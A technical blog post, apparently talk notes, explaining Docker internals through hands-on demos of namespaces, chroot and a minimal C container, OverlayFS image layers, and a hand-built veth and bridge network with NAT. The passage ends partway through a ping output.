wywwzjj's Blog

Container (Docker) is Process or Virtual Machine

2022/04/30

Is Docker a virtual machine? What key technologies does Docker rely on under the hood? When we talk about container escape, what exactly are we escaping from?

Besides answering these questions, this talk introduces a few interesting Docker-related vulnerabilities, including a mistake that even AWS security engineers have made.

Docker itself is fairly complex and hard to cover exhaustively in one session, so post-exploitation techniques are kept to a minimum and we focus on a few key technologies.

When I first encountered Docker, the thing I heard most often was: Docker is not a virtual machine.

Then you run into an Ubuntu Docker image and get even more confused: it looks almost identical to a real system, you can even install software with apt, and you're telling me this isn't a virtual machine?

Interestingly, treating a container as a virtual machine works just fine in practice, thanks in part to Docker's good design. But is a Docker container really a virtual machine?

  • Both are Ubuntu root directories. Is there any difference?


  • When an arbitrary-file-write vulnerability meets a container, can you still write to crontab?
  • What is the difference between these two sleep processes?

pstree -alpTS


  • Does Docker Engine replace the Hypervisor layer? Is it some new virtualization technology?


What are the major problems that need to be solved?


Technology has evolved from self-built server rooms, to cloud hosts, to today's lightweight FaaS.

Container technology splits the virtual machine, as a unit of computing, into smaller units. Computing resources keep being abstracted into services, and we have more and more options to choose from.

We can focus on the business itself and worry as little as possible about the operations layer.


Cloud Native

The cloud-native ecosystem is enormous; beyond the three big themes of compute, storage, and networking, it touches almost everything.

Today we focus on the Container part of that landscape.

If there is interest, we can cover Kubernetes in a later session.

The Alternative Solutions

Vagrant

https://www.vagrantup.com/

https://github.com/hashicorp/vagrant

Vagrant, released in 2010, is a solution for building and managing virtual machines that makes it easy to set up a reproducible workflow.

The problem it solves: how do you quickly create and configure virtual machines?


Vagrant provides no virtualization capability of its own; think of it as a wrapper around virtualization platforms.

It supports VirtualBox, VMware, and Hyper-V as providers, and even integrates with Docker.

Once the environment is configured, a few commands bring up a virtual machine:

vagrant init ubuntu/focal64  # Ubuntu 20.04 LTS
vagrant up
vagrant ssh
vagrant@vagrant:~$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

If you need to run batch tests against different kernels, this is considerably more convenient than using QEMU directly.

Select a Box

Much like Docker images: just pick a box you like and build on top of it.

https://app.vagrantup.com/boxes/search


You can also package a VM yourself and publish it there.

Vagrantfile

The automated provisioning steps live here; it is the counterpart of a Dockerfile.

Take deploying a Kubernetes cluster as an example: this Vagrantfile configures four virtual machines.

https://www.vagrantup.com/docs/vagrantfile/


Vagrant.configure("2") do |config|
config.vm.provision :shell, privileged: true, inline: $install_common_tools

config.vm.define :master do |master|
master.vm.provider :virtualbox do |vb|
vb.name = "master"
vb.memory = 2048
vb.cpus = 2
end
master.vm.box = "ubuntu/bionic64"
master.disksize.size = "25GB"
master.vm.hostname = "master"
master.vm.network :private_network, ip: "10.0.0.10"
master.vm.provision :shell, privileged: false, inline: $provision_master_node
end

%w{node1 node2 node3}.each_with_index do |name, i|
config.vm.define name do |node|
node.vm.provider "virtualbox" do |vb|
vb.name = "node#{i + 1}"
vb.memory = 2048
vb.cpus = 2
end
node.vm.box = "ubuntu/bionic64"
node.disksize.size = "25GB"
node.vm.hostname = name
node.vm.network :private_network, ip: "10.0.0.#{i + 11}"
node.vm.provision :shell, privileged: false, inline: <<-SHELL
sudo /vagrant/join.sh
echo 'Environment="KUBELET_EXTRA_ARGS=--node-ip=10.0.0.#{i + 11}"' | sudo tee -a /etc/systemd/system/kubelet.service.d/10-kubeadm.conf
cat /vagrant/id_rsa.pub >> /home/vagrant/.ssh/authorized_keys
sudo systemctl daemon-reload
sudo systemctl restart kubelet
SHELL
end
end
config.vm.provision "shell", inline: $install_multicast
end


$install_common_tools = <<-SCRIPT
...
# Install kubeadm, kubectl and kubelet
export DEBIAN_FRONTEND=noninteractive
apt-get -qq update && apt-get -qq install -y ebtables ethtool docker.io apt-transport-https curl
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
cat <<EOF >/etc/apt/sources.list.d/kubernetes.list
deb http://apt.kubernetes.io/ kubernetes-xenial main
EOF
SCRIPT
...

Puppet / Chef / Ansible

Popular automation and configuration-management tools, mostly operating over SSH or WinRM for deployment and day-to-day operations, as the sketch below illustrates.

Very convenient for operators, and just as convenient for penetration testers.
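
For example, a typical agentless Ansible ad-hoc command pushes a change to every host over plain SSH (the inventory file and module arguments here are illustrative, not from the original talk):

# Install nginx on every host in the inventory, escalating with sudo
ansible all -i hosts -m apt -a "name=nginx state=present" --become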

LXC

The predecessor of Docker.

https://github.com/lxc/lxc

In 2008, Linux 2.6.24 merged the cgroups feature into the mainline kernel. Linux Containers (LXC) was a Canonical project built on namespaces, cgroups, and related technologies, aimed squarely at the container world: the goal was a well-isolated container environment running on Linux. Naturally, it first appeared on Ubuntu.

In 2013, Docker debuted at PyCon. At the time it was developed on Ubuntu 12.04 as a tool layered on top of LXC, hiding LXC's usage details (much as Vagrant hides the underlying VM), so that a single docker run command was enough to create a container environment.

Other

Other popular automation and operations tools exist as well; like the ones above, they are convenient for operations and just as convenient during internal-network penetration.

Docker’s Key Techniques

A note on terminology: the earliest "Cap" in the timeline below is not the same thing as the POSIX capabilities we introduce later.


The Ideal Versus the Real: Revisiting the History of Virtual Machines and Containers

  • chroot: in 1979, Bell Labs introduced the chroot syscall.

  • Namespaces: the filesystem namespace was proposed in 2002, and the mechanism has been extended and iterated on ever since.

  • Seccomp: merged into the Linux kernel in 2006.

  • Cgroups: around 2006.

  • LXC: 2008, building containers from cgroups, namespaces, and capabilities.

  • Docker:

    2013: launched as a container-management platform based on LXC, making LXC easier to use.

    2014: replaced LXC with libcontainer (the predecessor of runc).

    2015: split the container runtime (libcontainer) out as the vendor-neutral project runc and launched the OCI.


Docker Architecture

What happens after you run docker run -d ubuntu:20.04 sleep 999999999?
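
In outline (a simplified sketch; the exact components vary across Docker versions):

docker CLI -> dockerd -> containerd -> containerd-shim -> runc
# runc sets up the namespaces/cgroups, starts sleep, then exits;
# the container's init process is left running, parented by the shim.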


Implementing Container Runtime Shim: runc


Namespaces

namespaces(7) - Linux manual page

A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource.

Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes.

One use of namespaces is to implement containers.

Limits what you can see.

Namespace  Flag             Isolates
Cgroup     CLONE_NEWCGROUP  Cgroup root directory
IPC        CLONE_NEWIPC     System V IPC, POSIX message queues
Network    CLONE_NEWNET     Network devices, stacks, ports, etc.
Mount      CLONE_NEWNS      Mount points
PID        CLONE_NEWPID     Process IDs
Time       CLONE_NEWTIME    Boot and monotonic clocks
User       CLONE_NEWUSER    User and group IDs
UTS        CLONE_NEWUTS     Hostname and NIS domain name

First experience of Namespaces

unshare - run program with some namespaces unshared from parent

➜  ~ id
uid=1000(iubu) gid=1000(iubu) groups=1000(iubu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

➜ ~ unshare -m -n -p -u -U -r -f --mount-proc bash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@ubuntu:~# ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.2 0.1 19920 5288 pts/2 S 13:33 0:00 bash
root 7 0.0 0.0 21584 3812 pts/2 R+ 13:33 0:00 ps -aux
root@ubuntu:~# hostname whlab && hostname
whlab
root@ubuntu:~# ip link
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
root@ubuntu:~# exit
exit
➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:d0:43:f7 brd ff:ff:ff:ff:ff:ff
altname enp2s1
➜ ~ hostname
ubuntu
➜  ~ diff <(ls -alh /proc/self/ns | awk '{print $9$10$11}' | uniq) <(sudo ls -lah /proc/`pidof bash`/ns | awk '{print $9$10$11}' | uniq)
< mnt->mnt:[4026531840]
< net->net:[4026531992]
< pid->pid:[4026531836]
< pid_for_children->pid:[4026531836]
---
> mnt->mnt:[4026532654]
> net->net:[4026532661]
> pid->pid:[4026532659]
> pid_for_children->pid:[4026532659]

< user->user:[4026531837]
< uts->uts:[4026531838]
---
> user->user:[4026532653]
> uts->uts:[4026532655]

Namespaces provide the basic isolation: every container runs in its own set of namespaces.


Namespaces system call

  • clone: when creating a process, the flags argument specifies which new namespaces to create.

    int clone(int (*fn)(void *), void *child_stack, int flags, void *arg);
    // CLONE_NEWCGROUP / CLONE_NEWIPC / CLONE_NEWNET / CLONE_NEWNS / CLONE_NEWPID
  • setns: joins the calling process to an existing namespace.

    int setns(int fd, int nstype);
  • unshare: moves the calling process into new namespaces.

    int unshare(int flags);

A minimal Docker-like demo in C

Docker基础技术:Linux Namespace(上) | 酷 壳 - CoolShell

#define _GNU_SOURCE              /* for clone(2) and sethostname(2) */
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <stdio.h>
#include <sched.h>
#include <signal.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024) /* Stack size for cloned child */

static char container_stack[STACK_SIZE];
char *const container_args[] = {
    "/bin/bash",
    "-l",
    NULL
};

int container_main(void *arg) {
    printf("Container [%5d] - inside the container!\n", getpid());

    /* set hostname */
    sethostname("container", 10);

    /* remount /proc so that top/ps show the container's processes */
    if (mount("proc", "rootfs/proc", "proc", 0, NULL) != 0) {
        perror("proc");
    }
    if (mount("sysfs", "rootfs/sys", "sysfs", 0, NULL) != 0) {
        perror("sys");
    }
    if (mount("none", "rootfs/tmp", "tmpfs", 0, NULL) != 0) {
        perror("tmp");
    }
    if (mount("udev", "rootfs/dev", "devtmpfs", 0, NULL) != 0) {
        perror("dev");
    }
    if (mount("devpts", "rootfs/dev/pts", "devpts", 0, NULL) != 0) {
        perror("dev/pts");
    }
    if (mount("shm", "rootfs/dev/shm", "tmpfs", 0, NULL) != 0) {
        perror("dev/shm");
    }
    if (mount("tmpfs", "rootfs/run", "tmpfs", 0, NULL) != 0) {
        perror("run");
    }
    /*
     * Imitate how Docker bind-mounts config files into the container.
     * Look under /var/lib/docker/containers/<container_id>/ on a real
     * host and you will find exactly these files.
     */
    if (mount("conf/hosts", "rootfs/etc/hosts", "none", MS_BIND, NULL) != 0 ||
        mount("conf/hostname", "rootfs/etc/hostname", "none", MS_BIND, NULL) != 0 ||
        mount("conf/resolv.conf", "rootfs/etc/resolv.conf", "none", MS_BIND, NULL) != 0) {
        perror("conf");
    }
    /* imitate what docker run's -v, --volume=[] option does */
    if (mount("/tmp/t1", "rootfs/mnt", "none", MS_BIND, NULL) != 0) {
        perror("mnt");
    }

    /* isolate the directory tree with chroot */
    if (chdir("./rootfs") != 0 || chroot("./") != 0) {
        perror("chdir/chroot");
    }

    execv(container_args[0], container_args);
    perror("exec");
    printf("Something's wrong!\n");
    return 1;
}

int main() {
    printf("Parent [%5d] - start a container!\n", getpid());
    int container_pid = clone(container_main, container_stack + STACK_SIZE,
                              CLONE_NEWUTS |
                              CLONE_NEWIPC |
                              CLONE_NEWPID |
                              CLONE_NEWNS |
                              SIGCHLD, NULL);
    waitpid(container_pid, NULL, 0);
    printf("Parent - container stopped!\n");
    return 0;
}

These global resources are provided by the operating system in the first place: it shows you what it wants to show you, and what it doesn't, you simply cannot see.

With unshare you can immediately get a Docker-like experience.

And that could almost be the end of the talk: at its core, Docker really is this simple.

The real runc, of course, does quite a bit more than this demo.

nsenter tool

sudo nsenter -t $(sudo docker inspect --format '{{ .State.Pid }}' 09335) -n ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
18: eth0@if19: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.3/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever


Usage:
nsenter [options] [<program> [<argument>...]]

Run a program with namespaces of other processes.

Options:
-a, --all enter all namespaces (target)
-t, --target <pid> target process to get namespaces from
-m, --mount[=<file>] enter mount namespace
-u, --uts[=<file>] enter UTS namespace (hostname etc)
-i, --ipc[=<file>] enter System V IPC namespace
-n, --net[=<file>] enter network namespace
-p, --pid[=<file>] enter pid namespace
-C, --cgroup[=<file>] enter cgroup namespace
-U, --user[=<file>] enter user namespace
-S, --setuid <uid> set uid in entered namespace
-G, --setgid <gid> set gid in entered namespace
--preserve-credentials do not touch uids or gids
-r, --root[=<dir>] set the root directory
-w, --wd[=<dir>] set the working directory
-F, --no-fork do not fork before execing <program>
-Z, --follow-context set SELinux context according to --target PID

-h, --help display this help
-V, --version display version

File System

rootfs


A core job of a container is to package the runtime environment, and that environment comes from images. Let's look at what is inside an image first:

# https://github.com/containers/skopeo
➜ ~ skopeo copy docker://ubuntu:20.04 oci:ubuntu:20.04

# https://github.com/opencontainers/umoci
➜ ~ umoci unpack --image ubuntu:20.04 ubuntu-bundle

➜ ~ ls -alh ubuntu-bundle
-rw-r--r-- 1 root root 2.9K Apr 25 20:07 config.json
drwxr-xr-x 17 root root 4.0K Dec 31 1969 rootfs
...

# Export a container's filesystem as a tar archive
# mkdir rootfs && docker export $(docker create ubuntu:20.04) | tar -C rootfs -xvf -

If the container is a shipping container, then config.json is its spec sheet.

The filesystem-related part of config.json:

chroot (pivot_root) + mount

"root": {
"path": "rootfs"
},
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc"
},
{
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"nosuid",
"strictatime",
"mode=755",
"size=65536k"
]
},
...
{
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"nosuid",
"noexec",
"nodev",
"relatime",
"ro"
]
}
]

The rootfs directory:

➜  ~ ls -alh ubuntu-bundle/rootfs
lrwxrwxrwx 1 root root 7 Apr 15 10:54 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Apr 15 2020 boot
drwxr-xr-x 2 root root 4.0K Apr 15 10:57 dev
drwxr-xr-x 30 root root 4.0K Apr 15 10:56 etc
drwxr-xr-x 2 root root 4.0K Apr 15 2020 home
lrwxrwxrwx 1 root root 7 Apr 15 10:54 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Apr 15 10:54 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Apr 15 10:54 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Apr 15 10:54 libx32 -> usr/libx32
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 media
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 mnt
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 opt
drwxr-xr-x 2 root root 4.0K Apr 15 2020 proc
drwx------ 2 root root 4.0K Apr 15 10:56 root
drwxr-xr-x 5 root root 4.0K Apr 15 10:57 run
lrwxrwxrwx 1 root root 8 Apr 15 10:54 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Apr 15 10:54 srv
drwxr-xr-x 2 root root 4.0K Apr 15 2020 sys
drwxrwxrwt 2 root root 4.0K Apr 15 10:57 tmp
drwxr-xr-x 13 root root 4.0K Apr 15 10:54 usr
drwxr-xr-x 11 root root 4.0K Apr 15 10:56 var

In practice, to save storage space, additional techniques are layered on top, such as OverlayFS. See: About storage drivers

"GraphDriver": {
"Data": {
"LowerDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63-init/diff:/var/lib/docker/overlay2/356fd2f50cfff3efdd2f04b0aa9e90092d8134dadfbda029bc16eae25d3f9f81/diff",
"MergedDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63/merged",
"UpperDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63/diff",
"WorkDir": "/var/lib/docker/overlay2/efbb6f6052536b6e193926530488525de1710325166a14a544c38e7bd26bfa63/work"
},
"Name": "overlay2"
}
root@69cdae2e90c3:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/I7OJVG6PNZR6XYZMPPC346MA6N:/var/lib/docker/overlay2/l/EEK3WLG3RPSB6CMMDQI6TAKSHS,upperdir=/var/lib/docker/overlay2/efd343546cc3e3dbc17d5c2d9166e475fe7759a487a6150684ac001c7627425e/diff,workdir=/var/lib/docker/overlay2/efd343546cc3e3dbc17d5c2d9166e475fe7759a487a6150684ac001c7627425e/work)
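
You can reproduce this layering by hand with a minimal OverlayFS experiment (a sketch, not Docker's exact invocation; run as root in a scratch directory):

mkdir -p lower upper work merged
echo "from lower" > lower/a.txt
mount -t overlay overlay -o lowerdir=lower,upperdir=upper,workdir=work merged
cat merged/a.txt              # from lower
echo "changed" > merged/a.txt
cat upper/a.txt               # "changed": writes are copied up into upperdir
umount merged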

chroot


root@ubuntu:/home/iubu/runc/ubuntu/rootfs# ls
bin boot dev etc home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
root@ubuntu:/home/iubu/runc/ubuntu/rootfs# chroot . bash
root@ubuntu:/# ps
Error, do this: mount -t proc proc /proc
root@ubuntu:/# ls -al /
-rwxr-xr-x 1 1000 1000 0 Apr 28 16:00 .dockerenv
drwxr-xr-x 2 1000 1000 12288 Apr 28 16:00 bin
drwxr-xr-x 2 1000 1000 4096 Apr 28 16:00 boot
drwxr-xr-x 4 1000 1000 4096 Apr 28 16:00 dev
drwxr-xr-x 30 1000 1000 4096 Apr 28 16:00 etc
drwxr-xr-x 2 1000 1000 4096 Apr 28 16:00 home
...
drwxr-xr-x 13 1000 1000 4096 Apr 28 16:00 var

All config in JSON

docker run -d -v /run/docker/runtime-runc/moby:/exp ubuntu:20.04 sleep inf
af90525455dee4abc8f83085c63224d1a03db89afccaaaf1556857758fdfe290

cat /run/docker/runtime-runc/moby/af90525455dee4abc8f83085c63224d1a03db89afccaaaf1556857758fdfe290/state.json

Newer Docker versions moved this directory to /run/containerd/io.containerd.runtime.v2.task/moby/


How does Docker implement volumes (-v /host:/xxx)? Again with mount: mount --bind.
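
A rough equivalent of -v /host:/xxx, minus the namespace plumbing (paths are illustrative; run as root):

mkdir -p /tmp/host-dir /tmp/container-view
echo hello > /tmp/host-dir/file
mount --bind /tmp/host-dir /tmp/container-view
cat /tmp/container-view/file    # hello
umount /tmp/container-view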


Networking

For penetration testers the network environment is especially sensitive, so it deserves its own discussion.

A few questions:

  • How do containers talk to each other?
  • How does a container talk to the host?
  • How does a container reach the outside network?
  • How do containers communicate across hosts? (See the Kubernetes article.)

Docker offers several network modes; below we focus on the default bridge mode.

  • bridge (default)
  • host: the container shares the host’s networking namespace
  • none: disable all networking

Network Namespace in Action

If you run these experiments on a machine that already has Docker installed, you will hit conflicts, because Docker's bridge is also called docker0.
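
A quick way to check which bridges already exist before experimenting:

➜ ~ ip link show type bridge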


Veth

Virtual Ethernet device: a pair of virtual NICs, used mainly for communication across network namespaces.

Think of it as two NICs connected by a cable: data sent into one end immediately comes out the other.

# Create a veth pair
ip link add <p1-name> type veth peer name <p2-name>
# Create a veth pair directly inside network namespaces
ip link add <p1-name> netns <p1-ns> type veth peer name <p2-name> netns <p2-ns>

Bridge

Ethernet bridge device: a virtual switch, which can also act as a gateway and forward traffic.

ip-link - network device configuration

Introduction to Linux interfaces for virtual networking | Red Hat Developer

bridge - Ethernet Bridge device
...
veth - Virtual ethernet interface
vlan - 802.1q tagged virtual LAN interface
vxlan - Virtual eXtended LAN
ip6tnl - Virtual tunnel interface IPv4|IPv6 over IPv6
ipip - Virtual tunnel interface IPv4 over IPv4
sit - Virtual tunnel interface IPv6 over IPv4
gre - Virtual tunnel interface GRE over IPv4
...

Let's build a simple bridged network like Docker's by hand:

# Create a network namespace
➜ ~ ip netns add docker1
➜ ~ ip netns list
docker1
➜ ~ l /run/netns
-r--r--r-- 1 root root 0 Apr 26 05:33 docker1
➜ ~ mount | grep netns
tmpfs on /run/netns type tmpfs (rw,nosuid,nodev,noexec,relatime,size=399468k,mode=755)
nsfs on /run/netns/docker1 type nsfs (rw)
nsfs on /run/netns/docker1 type nsfs (rw)

# A newly created netns has only a lo interface
➜ ~ ip netns exec docker1 ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
➜ ~ ip netns exec docker1 ip link set dev lo up # optional
➜ ~ ip netns exec docker1 ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever


# Create a pair of virtual NICs
➜ ~ ip link add bridge-veth1 type veth peer name veth1
➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:c2:f4:77 brd ff:ff:ff:ff:ff:ff
3: veth1@bridge-veth1: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether aa:29:f4:e8:ed:d6 brd ff:ff:ff:ff:ff:ff
4: bridge-veth1@veth1: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether 4e:d1:a9:86:2f:32 brd ff:ff:ff:ff:ff:ff


# Move one end of the pair (veth1) into the docker1 netns
➜ ~ ip link set veth1 netns docker1
➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:c2:f4:77 brd ff:ff:ff:ff:ff:ff
4: bridge-veth1@if3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether 4e:d1:a9:86:2f:32 brd ff:ff:ff:ff:ff:ff link-netns docker1
# veth1 now shows up inside docker1
➜ ~ ip netns exec docker1 ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
3: veth1@if4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
link/ether a2:c9:82:eb:67:cb brd ff:ff:ff:ff:ff:ff link-netnsid 0


# Rename veth1 to eth0 and assign an IP address
➜ ~ ip netns exec docker1 ip link set dev veth1 name eth0
➜ ~ ip netns exec docker1 ip addr add 10.0.0.11/24 dev eth0
➜ ~ ip netns exec docker1 ip link set eth0 up
➜ ~ ip link set bridge-veth1 up
➜ ~ ip netns exec docker1 ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether be:d0:48:d1:39:bf brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.0.11/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::bcd0:48ff:fed1:39bf/64 scope link
valid_lft forever preferred_lft forever

Set up docker2 the same way:

ip netns add docker2
ip netns exec docker2 ip link set dev lo up
ip link add bridge-veth2 type veth peer name veth2 netns docker2
ip netns exec docker2 ip link set dev veth2 name eth0
ip netns exec docker2 ip addr add 10.0.0.12/24 dev eth0
ip netns exec docker2 ip link set eth0 up
ip link set dev bridge-veth2 up


➜ ~ ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
link/ether 00:0c:29:c2:f4:77 brd ff:ff:ff:ff:ff:ff
4: bridge-veth1@if3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 4e:d1:a9:86:2f:32 brd ff:ff:ff:ff:ff:ff link-netns docker1
5: bridge-veth2@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 62:7d:2f:b1:cb:45 brd ff:ff:ff:ff:ff:ff link-netns docker2

Add a bridge, i.e. the docker0 part:

➜  ~ ip link add docker0 type bridge
➜ ~ ip link set docker0 up

# Attach bridge-veth1 and bridge-veth2 to the bridge
➜ ~ ip link set bridge-veth1 master docker0
➜ ~ ip link set bridge-veth2 master docker0

# List the interfaces attached to the bridge
➜ ~ ip link show master docker0

Current addresses:

➜  ~ ip -all netns exec ip a
netns: docker2
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 86:61:6b:7c:cf:50 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.0.12/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::8461:6bff:fe7c:cf50/64 scope link
valid_lft forever preferred_lft forever

netns: docker1
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether aa:29:f4:e8:ed:d6 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.0.0.11/24 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a829:f4ff:fee8:edd6/64 scope link
valid_lft forever preferred_lft forever

docker1 and docker2 can now reach each other:

➜  ~ ip -all netns exec ping -c 1 10.0.0.12    
netns: docker2
PING 10.0.0.12 (10.0.0.12) 56(84) bytes of data.
64 bytes from 10.0.0.12: icmp_seq=1 ttl=64 time=0.023 ms

--- 10.0.0.12 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.023/0.023/0.023/0.000 ms

netns: docker1
PING 10.0.0.12 (10.0.0.12) 56(84) bytes of data.
64 bytes from 10.0.0.12: icmp_seq=1 ttl=64 time=0.029 ms

--- 10.0.0.12 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.029/0.029/0.029/0.000 ms


➜ ~ ip -all netns exec ping -c 1 10.0.0.11
netns: docker2
PING 10.0.0.11 (10.0.0.11) 56(84) bytes of data.
64 bytes from 10.0.0.11: icmp_seq=1 ttl=64 time=0.039 ms

--- 10.0.0.11 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.039/0.039/0.039/0.000 ms

netns: docker1
PING 10.0.0.11 (10.0.0.11) 56(84) bytes of data.
64 bytes from 10.0.0.11: icmp_seq=1 ttl=64 time=0.020 ms

--- 10.0.0.11 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.020/0.020/0.020/0.000 ms

Still no route to the outside world:

➜  ~ ip netns exec docker1 ping -c 1 1.1.1.1  
ping: connect: Network is unreachable

One key step remains: set up forwarding.

➜  ~ ip addr add 10.0.0.1/24 dev docker0

# Add a default route pointing at the bridge
➜ ~ ip -all netns exec ip route add default via 10.0.0.1
➜ ~ ip -all netns exec ip route
netns: docker2
default via 10.0.0.1 dev eth0
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.12

netns: docker1
default via 10.0.0.1 dev eth0
10.0.0.0/24 dev eth0 proto kernel scope link src 10.0.0.11


# Enable IP forwarding and NAT
➜ ~ sysctl -w net.ipv4.ip_forward=1
➜ ~ iptables -t nat -A POSTROUTING -s 10.0.0.1/24 -j MASQUERADE

Now the outside world is reachable:

➜  ~ ip -all netns exec ping -c 1 1.1.1.1
netns: docker2
